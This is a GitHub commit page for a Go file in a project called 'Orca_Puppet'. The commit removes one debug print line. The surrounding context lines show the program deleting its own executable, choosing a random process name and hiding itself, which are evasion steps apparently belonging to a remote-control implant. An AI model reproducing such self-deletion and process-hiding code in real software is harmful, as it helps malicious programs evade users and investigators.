We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 2a26a4e commit 3e6b709Copy full SHA for 3e6b709
Orca_Puppet/define/setting/setting.go
@@ -40,7 +40,6 @@ func SetUp() {
40
}
41
42
path, _ := util.GetExecPathEx()
43
- fmt.Println(path)
44
defer os.Remove(path)
45
name := util.GetRandomProcessName()
46
hide.Hide(name)
0 commit comments